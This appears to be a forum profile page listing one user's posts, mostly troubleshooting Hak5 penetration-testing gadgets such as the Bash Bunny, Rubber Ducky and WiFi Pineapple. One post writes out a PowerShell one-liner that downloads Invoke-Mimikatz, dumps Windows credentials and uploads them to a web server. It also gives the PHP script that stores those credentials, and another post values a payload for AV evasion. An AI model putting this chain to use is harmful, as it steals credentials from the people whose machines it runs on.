Jump to content

TeCHemically

Active Members
  • Posts

    131
  • Joined

  • Last visited

Everything posted by TeCHemically

  1. Great advice, thanks for your response! I took your advice and here is what I got: 2017-11-20_19-46-03.creds is not writable.#file_put_contents($file, file_get_contents("php://input")); So, it looks like the file does not have write permissions. I thought I had the permissions set appropriately; but clearly I wasn't right. The file has write permissions for www-data (file is owned by www-data). What setting do I need to set so that this file has permissions to write to the server? Sorry for the nooby question. Thanks again for your help in identifying the issue!
  2. I have a question about this; I have always used tcpdump for this attack because the PHP file never gathers the incoming credentials. Can someone tell me what I am doing wrong? I am using the same command like above: powershell "IEX (New-Object Net.WebClient).DownloadString('MyWebServer/My.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('MyWebServer/My.php', $output)" Here is the PHP script: <?php $file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds"; file_put_contents($file, file_get_contents("php://input")); ?> it was broken up like this before; but didn't see,m to have any affect (i know almost nothing of PHP; so this probably makes no difference): <?php $file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds"; file_put_contents($file, file_get_contents("php://input")); ?> Thanks to any who reply!
  3. Windows 10 has patched lsass now which effectively breaks mimikatz functionality.
  4. So, the ducknunter on nethunter uses 2 different elements to inject strings. One being STRING, like normal, and the other being TEXT. When you use STRING, the LF at the end of your line is interpreted as an ENTER keystroke. If you just want to enter a string then you need to use the TEXT element instead. I can see how this could make your scripts more efficient; but unless you know about this it just drives you crazy. Hope this helps someone!
  5. I am unable to use scripts that open CMD as admin because phantom ENTER lines are bring executed after my "STRING cmd" lines in my ducky scripts. This is also happening other places. I have a workaround to get an admin prompt; but it is of no use because these ENTER keystrokes are bring entered in places where they should not be; and since they aren't actually in the script I cannot remove them. It may be that the end of line EOL character (LF in this case) is being interpreted as an ENTER keystroke. Is there anyway to convert all EOL characters in a file from LF or CRLF to some kind of NULL character so the Duckhunter HID conversion tool won't add in these ENTER keystrokes? Thanks to all who reply. This has been driving me nuts!
  6. I have not had any success with my bash bunny since I bought it on the day it launched. Install tools has never worked, no matter what workarounds have been posted to try. The payloads dont execute properly with the exception of a couple ducky payloads that executed a few times with issues. Now even the ducky script payloads fail to respond. I get no lights at all when trying to run the install tools payload. I would like to speak with someone about a replacement. This device has never worked and it does not behave at all like the readme files state it should. I fought with it so long that I just set it down for a few months and picked it back up again today. Still its a whirlwind of fail. Please help me out here. I was so excited about this platform that I bought it on day one. I believe there is just some issue with the specific device I received. Any help and guidance is greatly appreciated!
  7. I got airodump results on a different laptop. Do you know if the cards in the hakshop are NEH or NHA? If this wont work on my main rig then I'm going to have to return it. Shame too. It was a great price. I hope Darren isn't carrying the crap shoot card that contains inconsistent chipsets.
  8. I just got the RT3070 usb adapter and airodump isn't working on any OS. Tried 3 systems so far and every one of them shows all blank once the card is in mon mode and I start airodump. I ran check kill so nothing is interfering with it. What's the deal with this card? Any help is appreciated.
  9. I have to agree that the vast majority of the time I have spent with my pineapples has been in troubleshooting, factory resetting, re-flashing, etc. The tool has great promise; but has never been stable for me in any true long term or feasible "deployment" sense. It has been fun to play with, while I'm not screaming at it for bugs I am fighting with; but I have never gotten any iteration to function in a consistent and stable way...and my first pineapple was a fon I built myself. So, I'm not talking about a passing fancy here. I've been involved with these things all the way up to the Mark V. Given my issues, and the fact that support for older models drops off very quickly, I just cant justify purchasing either of the newer models. Sad :(
  10. Following the DIP switch reset procedure so that should be good; but why am I getting permission denied with SCP and SSH? This has been the case across multiple factory resets.
  11. Found this; so I am factory resetting now. Hopefully this solves the issue. If anyone knows what is going on please do reply.: You can use the DIP switches to perform a factory reset but it sounds like you may be using the wrong switches or not using the correct procedure. Try this: NOTE: With the switches facing you, they are ordered 1 - 5 from left to right. 1) Power off your Pineapple. 2) Place your DIP switches in the following sequence: Switch 1 - UP Switch 2 - DOWN Switch 3 - DOWN Switch 4 - UP Switch 5 - UP 3) Power on your Pineapple 4) Wait 5 minutes just to be safe and power off again 5) Place all of your switches back in the up position again and power on. You should be good to go. Just connect via ethernet or Wifi, login to the web interface, and create a new password.
  12. I am unable to SCP or SSH to the mark V. Getting "permission denied" error for both. This has been constant prior to today; however, today when minimizing infusions they will no longer maximize again and I cannot factory reset or even properly reboot the device. So I need to be able to reflash it over SSH. Any ideas? Am I overlooking something here? Using port 22 for both.
  13. I have minimized several infusions and now they will not come back to the interface. Configuration is one of them so I cannot factory reset the pineapple. Trying to SSH in fails with permission denied. Is there a fix for this issue? How can i restore the infusions so they are accessible?
  14. Mode G appeared successful; but I was never able to get connected via sceen to verify the bunny could get out. I am on an ubuntu based distro. I tried ECM and RNDIS. RNDIS listed as ttyACM0 for a time; but now it wont list as a tty at all whether ECM or RNDIS. Even after reboots. It just seems absent for some reason; although it shows the eth1 in ifconfig
  15. When using mode C with bb.sh I get the following error: SIOCDELRT: No such process
  16. My bashbunny does not show a device in Win7 and the devmgr shows under "other devices" a "RNDIS" entry with the yellow exclamation symbol indicating driver failure. Trying to point it to the bunny as suggested for the similar problem for CDC Serial driver issues does not help. I followed the steps here as far as i could: http://wiki.bashbunny.com/?_escaped_fragment_=././index.md%23Sharing_an_Internet_Connection_with_the_Bash_Bunny_from_Windows#!././index.md%23Sharing_an_Internet_Connection_with_the_Bash_Bunny_from_Windows I've not had any success installing tools, connecting to internet, or anything else so far. It's been a pretty big let down for a first day. Any guidance is appreciated!
  17. I have setup and confirmed the funcitonality of this payload via tcpdump; but the Invoke mimikatz payload's "rx.php" fails to create .creds files. Confirmed appropriate permissions on the php script for www-data. Still nothing is created and no creds are captured. I can see them get sent to the server via packet capture; but if that's not running I don't ever see the creds files the rx.php script is supposed to create.
  18. Sorry, I wasn't clear in my post. I'm not referring to using this on any of my pineapples. I meant using poisontap in general according to the prescribed method.
  19. Has anyone gotten the poisontap to work successfully? It appears to function properly when looking at tcpdump on the target; but I never get anything reaching out to the nodejs control server. Also, how does one interact with the nodejs server? Navigating to the server's interface:port give a "sorry unknown url" error.
  20. I am having the same issue with ettercap. It starts but once I hit refresh it immediately changes to "ettercap not running". Tried running it on br-lan & eth0.
  21. factory reset and SD format fixed issue, issue resolved (shotgun method)
  22. Ettercap and sslstrip will not install on my MK5. Notifications says they install successfully; but when I go back to the infusion list is says they need to be updated again. I have tried removing and rebooting but no love. Still does the same thing on these 2 infusions.
  23. This script is now failing in Kali. I have tried on 2 separate install that are up to date and get the following error: [*] Generating shellcode No platform was selected, choosing Msf::Module::Platform::Windows from the payload No Arch selected, selecting Arch: x86 from the payload Found 0 compatible encoders reverse_powershell_ducky.rb:51:in `gsub': invalid byte sequence in UTF-8 (ArgumentError) from reverse_powershell_ducky.rb:51:in `clean_shellcode' from reverse_powershell_ducky.rb:45:in `shellcode_gen' from reverse_powershell_ducky.rb:90:in `<main>' Any help is greatly appreciated as this is my go to method in testing due to its AV evasion ability Also, would it be possible to have this script accept domain names as well as IP addresses?
  24. WOW, just...WOW man...the new simple-ducky is freaking BEAUTIFUL!!! Amazing work Skysploit; a true inspiration! Way to go and THANK YOU! :D :D
×
×
  • Create New...